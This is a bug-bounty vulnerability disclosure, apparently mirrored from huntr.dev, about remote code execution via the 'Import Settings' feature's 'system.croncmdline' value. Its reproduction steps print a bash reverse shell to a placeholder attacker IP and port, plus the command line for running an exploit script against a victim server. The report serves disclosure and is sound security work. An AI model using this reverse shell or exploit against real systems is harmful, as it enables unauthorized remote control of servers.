Lucene search

K
huntrBlakdukB29CF038-06F1-4FB0-9437-08F2991F92A8
HistoryFeb 04, 2023 - 8:49 a.m.

Remote Code Execution in "Import Settings" feature

2023-02-0408:49:41
blakduk
www.huntr.dev
9
improper data validation
crafted settings
authenticated attack
reverse shell
exploit
poc video
bug bounty

0.001 Low

EPSS

Percentile

39.6%

Description

Due to Improper data validation in “Import Settings” feature, an authenticated attacker can send crafted settings with malicious payload inside “system.croncmdline” value.

Step to reproduce

Requirement: PHP code must be executed on attacker machine

  • Step 1: Attacker run web server and deliver foo.txt file. The contain of this file is a reverse shell to attacker machine, for example:
#!/bin/bash
bash -i >& /dev/tcp/{ATTACKER-IP}/{ATTACKER-PORT} 0>&1
  • Step 2: Run file exploit.py and required by this exploit
python3 exploit.py -t {VICTIM-WEBSERVER} -u {USERNAME} -p {PASSWORD} -s {ATTACKER-WEBSERVER} -lport {ATTACKER-LISTENING-PORT}

Proof of Concept

0.001 Low

EPSS

Percentile

39.6%

Related for B29CF038-06F1-4FB0-9437-08F2991F92A8